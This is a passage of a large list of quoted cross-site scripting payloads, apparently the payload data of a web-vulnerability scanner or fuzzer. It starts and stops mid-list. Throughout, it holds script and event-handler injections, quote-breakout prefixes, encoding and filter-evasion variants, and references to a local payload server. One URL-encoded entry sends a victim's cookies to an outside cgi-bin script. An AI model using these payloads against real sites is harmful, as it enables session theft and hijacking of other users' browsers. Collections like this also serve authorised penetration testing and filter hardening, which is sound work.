"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", '"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(\'alert(1)\')()</script>', "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "'><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>", "</ScrIpt><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", '"><script>history.pushState(0,0,\'/i/am/somewhere_else\');</script>', "</ScrIpt><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", "'><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", "</ScrIpt><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", '<script src="#">{alert(1)}</script>;1', '"><script src="#">{alert(1)}</script>;1', '\'><script src="#">{alert(1)}</script>;1', '+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);', '<b><script<b></b><alert(1)</script </b></b>', '"><b><script<b></b><alert(1)</script </b></b>', "'><b><script<b></b><alert(1)</script </b></b>", '<script<{alert(1)}/></script </>', '"><script<{alert(1)}/></script </>', "'><script<{alert(1)}/></script </>", '0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(\'data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk\'))', "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "</ScrIpt><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", '"><script>crypto.generateCRMFRequest(\'CN=0\',0,0,null,\'alert(1)\',384,null,\'rsa-dual-use\')</script>', 
"</ScrIpt><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "'><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "</ScrIpt><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", "</ScrIpt><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", '"><script>[{\'a\':Object.prototype.__defineSetter__(\'b\',function(){alert(arguments[0])}),\'b\':[\'secret\']}]</script>', "</ScrIpt><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", "'><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", "</ScrIpt><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></svg>', '<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', '"><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', '\'><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', '<iframe 
src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', '"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', '\'><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', '<svg><style><img/src=x onerror=alert(1)// </b>', '"><svg><style><img/src=x onerror=alert(1)// </b>', "'><svg><style><img/src=x onerror=alert(1)// </b>", '<?xml-stylesheet href="javascript:alert(1)"?><root/>', '"><?xml-stylesheet href="javascript:alert(1)"?><root/>', '\'><?xml-stylesheet href="javascript:alert(1)"?><root/>', '<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '"><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '\'><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '<!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>', '"><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>', '\'><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>', '<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '"><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '\'><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', '"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', '\'><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', '<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet 
xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if> </template> </stylesheet>', '"><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if> </template> </stylesheet>', '\'><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if> </template> </stylesheet>', '<!ENTITY x "<html:img src=\'x\' xmlns:html=\'http://www.w3.org/1999/xhtml\' onerror=\'alert(1)\'/>">', '"><!ENTITY x "<html:img src=\'x\' xmlns:html=\'http://www.w3.org/1999/xhtml\' onerror=\'alert(1)\'/>">', '\'><!ENTITY x "<html:img src=\'x\' xmlns:html=\'http://www.w3.org/1999/xhtml\' onerror=\'alert(1)\'/>">', 'X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >', '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>', '1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>', '1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#X></vmlframe>', '<xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>', '"><xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>', '\'><xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" 
strokeweight="2000px" filled="false" /> </xml>', '1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>', '<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', '"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', '\'><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', '<x style="behavior:url(test.sct)">', '"><x style="behavior:url(test.sct)">', '\'><x style="behavior:url(test.sct)">', '<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>', '"><SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>', '\'><SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>', '<xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>', '"><xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>', '\'><xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>', '<?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>', '"><?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>', '\'><?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>', '<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', '"><?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', '\'><?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', 'object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param 
name=postdomevents /></object>', 'class X {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}', '<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '"><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '\'><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', '"><body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', "'><body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>", 'X<form id=test onforminput=javascript:alert(1)><input></form>', 'X<form id=test><input></form><button form=test onformchange==javascript:alert(1)>X', '<input onblur=write(1) autofocus><input autofocus>', '"><input onblur=write(1) autofocus><input autofocus>', "'><input onblur=write(1) autofocus><input autofocus>", '<video onerror="javascript:alert(1)"><source>', '"><video onerror="javascript:alert(1)"><source>', '\'><video onerror="javascript:alert(1)"><source>', '<q/oncut=open()>', '"><q/oncut=open()>', "'><q/oncut=open()>", '<marquee<marquee/onstart=confirm(1)>', '"><marquee/onstart=confirm(1)>', 
"'><marquee/onstart=confirm(1)>/onstart=confirm(1)>", '<body language=vbsonload=alert-1', '"><body language=vbsonload=alert-1', "'><body language=vbsonload=alert-1", '<command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '"><command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '\'><command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '<q/oncut=alert(1)>', '"><q/oncut=alert(1)>', "'><q/oncut=alert(1)>", 'eval("aler"+(!![]+[])[+[]])("X")', 'window["alert"]("X")', "this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()", '< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \\x3c \\x3C \\u003c \\u003C', '">< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \\x3c \\x3C \\u003c \\u003C', "'>< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \\x3c \\x3C \\u003c \\u003C", '<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '"><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '\'><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '<A HREF="http://1113982867/">X</A>', '"><A HREF="http://1113982867/">X</A>', '\'><A HREF="http://1113982867/">X</A>', '<A HREF="h tt\tp://6	6.000146.0x7.147/">X</A>', '"><A HREF="h tt\tp://6	6.000146.0x7.147/">X</A>', '\'><A HREF="h tt\tp://6	
6.000146.0x7.147/">X</A>', '<A HREF="//google">X</A>', '"><A HREF="//google">X</A>', '\'><A HREF="//google">X</A>', '<A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A', '"><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A', '\'><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A', '<A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '"><A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '\'><A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', 'document.write(\'<iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" style="border: 0; width: 100%; height: 100%"></iframe>\')', 'http://%22%20onerror=%22alert%281%29;//', "document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'", 'document.location="http://127.0.0.1:3555/xss_serve_payloads/X.html"', '\\"><script>alert(/X/)<script>', ';alert%28String.fromCharCode%2875,67,70%29%29//\\%27;alert%28String.fromCharCode%2875,67,70%29%29//%22;alert%28String.fromCharCode%2875,67,70%29%29//\\%22;alert%28String.fromCharCode%2875,67,70%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2875,67,70%29%29%3C/SCRIPT%3E', '<input onfocus=write(1) autofocus>', '"><input onfocus=write(1) autofocus>', "'><input onfocus=write(1) autofocus>", '<video poster=javascript:alert(1)//></video>', '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", '<video poster=prompt(1)//></video>', '"><video poster=prompt(1)//></video>', "'><video poster=prompt(1)//></video>", '<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body 
onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>', '"><form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>', "'><form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>", '<video><source onerror="alert(1)">', '"><video><source onerror="alert(1)">', '\'><video><source onerror="alert(1)">', '<video><source onerror="prompt(1)">', '"><video><source onerror="prompt(1)">', '\'><video><source onerror="prompt(1)">', '<video><source onerror="prompt(1)">', '"><video><source onerror="prompt(1)">', '\'><video><source onerror="prompt(1)"></source></video>', '"><video><source onerror="prompt(1)"></source></video>', '\'><video><source onerror="prompt(1)"></source></video>', '<form><button formaction="javascript:alert(1)">X</button>', '"><form><button formaction="javascript:alert(1)">X</button>', '\'><form><button formaction="javascript:alert(1)">X</button>', '<body oninput=alert(1)><input autofocus>', '"><body oninput=alert(1)><input autofocus>', "'><body oninput=alert(1)><input autofocus>", '<body oninput=prompt(1)><input autofocus>', '"><body oninput=prompt(1)><input autofocus>', "'><body oninput=prompt(1)><input autofocus>", '<frameset onload=prompt(1)>', '"><frameset onload=prompt(1)>', "'><frameset onload=prompt(1)>", '<comment><img src="</comment><img src=x onerror=alert(1)//">', '"><comment><img src="</comment><img src=x onerror=alert(1)//">', '\'><comment><img src="</comment><img src=x onerror=alert(1)//">', '<comment><img src="</comment><img src=x onerror=prompt(1)//">', '"><comment><img src="</comment><img src=x onerror=prompt(1)//">', '\'><comment><img src="</comment><img src=x onerror=prompt(1)//">', '<style><img src="</style><img src=x 
onerror=prompt(1)//">', '"><style><img src="</style><img src=x onerror=prompt(1)//">', '\'><style><img src="</style><img src=x onerror=prompt(1)//">', '<SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>', '"><SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>', "'><SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>", '<div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>', '"><div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>', "'><div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>", '<img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">', '"><img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">', '\'><img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">', "'-prompt(1)'", "'-alert(1)-'", '\';alert(String.fromCharCode(75,67,70))//\';alert(String.fromCharCode(75,67,70))//";', 'alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', '<IMG SRC=# onmouseover="alert(\'X\')">', '"><IMG SRC=# onmouseover="alert(\'X\')">', '\'><IMG SRC=# onmouseover="alert(\'X\')">', '<IMG SRC=javascript:alert('XSS')>', '"><IMG SRC=javascript:alert('XSS')>', "'><IMG SRC=javascript:alert('XSS')>", '<IMG SRC="jav
ascript:alert(\'X\');">', '"><IMG SRC="jav
ascript:alert(\'X\');">', '\'><IMG SRC="jav
ascript:alert(\'X\');">', 'exp/*<A STYLE=\'no\\X:noX("*//*");X:ex/*X*//*/*/pression(alert("X"))\'>', '\'"--></style></script><script>alert("X")</script>', '\'"--></style></script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"></script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', "'></script><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '&\'"><script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', '"><script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', "'><script>alert(/X/)</script>", '</ScrIpt><script>alert(/X/)</script>', "%26'%22%3E%3Cscript%3Ealert(%2FX%2F)%3C%2Fscript%3E%3D", '&\'">PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4', '&\'">/\'-C<FEP=#YA;&5R="@O>\'-S+RD\\+W-C<FEP=#.', '&\'">\\u{3c}\\u{73}\\u{63}\\u{72}\\u{69}\\u{70}\\u{74}\\u{3e}\\u{61}\\u{6c}\\u{65}\\u{72}\\u{74}\\u{28}\\u{2f}\\u{78}\\u{73}\\u{73}\\u{2f}\\u{29}\\u{3c}\\u{2f}\\u{73}\\u{63}\\u{72}\\u{69}\\u{70}\\u{74}\\u{3e}', '&\'">\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u002f\\u0078\\u0073\\u0073\\u002f\\u0029\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e', '&\'">0x3c7363726970743e616c657274282f7873732f293c2f7363726970743e', '&\'">-1,54,38,53,44,51,55,-1,36,47,40,53,55,-1,-1,59,54,54,-1,-1,-1,-1,54,38,53,44,51,55,-1', '&\'">PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '&\'">3e7470697263732f3c292f7373782f287472656c613e7470697263733c', 
'&\'">chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62).chr(97).chr(108).chr(101).chr(114).chr(116).chr(40).chr(47).chr(120).chr(115).chr(115).chr(47).chr(41).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62)', '&\'">TypeError: Cannot read property \'$content$\' of undefined', '&\'">\\74\\163\\143\\162\\151\\160\\164\\76\\141\\154\\145\\162\\164\\50\\57\\170\\163\\163\\57\\51\\74\\57\\163\\143\\162\\151\\160\\164\\76', '&\'"><script>alert(/X/)</???>', '&\'">%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u002f%u0078%u0073%u0073%u002f%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e', '&\'">\\uff1c\\uff53\\uff43\\uff52\\uff49\\uff50\\uff54\\uff1e\\uff41\\uff4c\\uff45\\uff52\\uff54\\uff08\\uff0f\\uff58\\uff53\\uff53\\uff0f\\uff09\\uff1c\\uff0f\\uff53\\uff43\\uff52\\uff49\\uff50\\uff54\\uff1e', '&\'"><script>alert(/X/)</script>', '&\'"><script>alert(/X/)</script>', '&\'">Description:Syntax error Msg:Unexpected token < )', '</script><svg onload=\'-/"/-alert(1)//\'>', '"></script><svg onload=\'-/"/-alert(1)//\'>', '\'></script><svg onload=\'-/"/-alert(1)//\'>', '<!-- --!><script>alert(X)</script>-->', '"><!-- --!><script>alert(X)</script>-->', "'><!-- --!><script>alert(X)</script>-->", '<![CDATA[<script>alert(X)</script>]]>', '"><![CDATA[<script>alert(X)</script>]]>', "'><![CDATA[<script>alert(X)</script>]]>", '[data "1<div style=width:expression(prompt(1))>"]', '+onerror=alert(1)%3E/', '+onerror=prompt(1)%3E/', '?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e', '?#?gad=xxxx"onload="alert(1)"', '#?gad=xxxx"onload="alert(1)"', '/#?gad=xxxx"onload="alert(1)"', '?><script >alert(1)</script >', 
'?><ScRiPt>alert(1)</ScRiPt>', '?%3e%3cscript%3ealert(1)%3c/script%3e', '?><scr<script>ipt>alert(1)</scr</script>ipt>', '"><scr<script>ipt>alert(1)</scr</script>ipt>', "'><scr<script>ipt>alert(1)</scr</script>ipt>", '%00?><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<xml onreadystatechange=alert(1)>', '"><xml onreadystatechange=alert(1)>', "'><xml onreadystatechange=alert(1)>", '<style onreadystatechange=alert(1)>', '"><style onreadystatechange=alert(1)>', "'><style onreadystatechange=alert(1)>", '<iframe onreadystatechange=alert(1)>', '"><iframe onreadystatechange=alert(1)>', "'><iframe onreadystatechange=alert(1)>", '<object onerror=alert(1)>', '"><object onerror=alert(1)>', "'><object onerror=alert(1)>", '<object type=image src=X.gif onreadystatechange=alert(1)></object>', '"><object type=image src=X.gif onreadystatechange=alert(1)></object>', "'><object type=image src=X.gif onreadystatechange=alert(1)></object>", '<img type=image src=X.gif onreadystatechange=alert(1)>', '"><img type=image src=X.gif onreadystatechange=alert(1)>', "'><img type=image src=X.gif onreadystatechange=alert(1)>", '<input type=image src=X.gif onreadystatechange=alert(1)>', '"><input type=image src=X.gif onreadystatechange=alert(1)>', "'><input type=image src=X.gif onreadystatechange=alert(1)>", '<isindex type=image src=X.gif onreadystatechange=alert(1)>', '"><isindex type=image src=X.gif onreadystatechange=alert(1)>', "'><isindex type=image src=X.gif onreadystatechange=alert(1)>", '<script onreadystatechange=alert(1)>', '"><script onreadystatechange=alert(1)>', "'><script onreadystatechange=alert(1)>", '<bgsound onpropertychange=alert(1)>', '"><bgsound onpropertychange=alert(1)>', "'><bgsound onpropertychange=alert(1)>", '<body onbeforeactivate=alert(1)>', '"><body onbeforeactivate=alert(1)>', "'><body onbeforeactivate=alert(1)>", 
'<body onactivate=alert(1)>', '"><body onactivate=alert(1)>', "'><body onactivate=alert(1)>", '<body onfocusin=alert(1)>', '"><body onfocusin=alert(1)>', "'><body onfocusin=alert(1)>", '<input onblur=alert(1) autofocus><input autofocus>', '"><input onblur=alert(1) autofocus><input autofocus>', "'><input onblur=alert(1) autofocus><input autofocus>", '<body onscroll=alert(1)><br><br>...<br><input autofocus>', '"><body onscroll=alert(1)><br><br>...<br><input autofocus>', "'><body onscroll=alert(1)><br><br>...<br><input autofocus>", '</a onmousemove=alert(1)>', '"></a onmousemove=alert(1)>', "'></a onmousemove=alert(1)>", '<video src=1 onerror=alert(1)>', '"><video src=1 onerror=alert(1)>', "'><video src=1 onerror=alert(1)>", '<audio src=1 onerror=alert(1)>', '"><audio src=1 onerror=alert(1)>', "'><audio src=1 onerror=alert(1)>", '<object data=javascript:alert(1)>', '"><object data=javascript:alert(1)>', "'><object data=javascript:alert(1)>", '<iframe src=javascript:alert(1)>', '"><iframe src=javascript:alert(1)>', "'><iframe src=javascript:alert(1)>", '<embed src=javascript:alert(1)>', '"><embed src=javascript:alert(1)>', "'><embed src=javascript:alert(1)>", '<form id=test /><button form=test formaction=javascript:alert(1)>', '"><form id=test /><button form=test formaction=javascript:alert(1)>', "'><form id=test /><button form=test formaction=javascript:alert(1)>", '<event-source src=javascript:alert(1)>', '"><event-source src=javascript:alert(1)>', "'><event-source src=javascript:alert(1)>", '<x style=x:expression(alert(1))>', '"><x style=x:expression(alert(1))>', "'><x style=x:expression(alert(1))>", '<x style=behavior:url(#default#time2) onbegin=alert(1)>', '"><x style=behavior:url(#default#time2) onbegin=alert(1)>', "'><x style=behavior:url(#default#time2) onbegin=alert(1)>", '<iMg onerror=alert(1) src=a>', '"><iMg onerror=alert(1) src=a>', "'><iMg onerror=alert(1) src=a>", '<[%00]img onerror=alert(1) src=a>', '"><[%00]img onerror=alert(1) src=a>', "'><[%00]img 
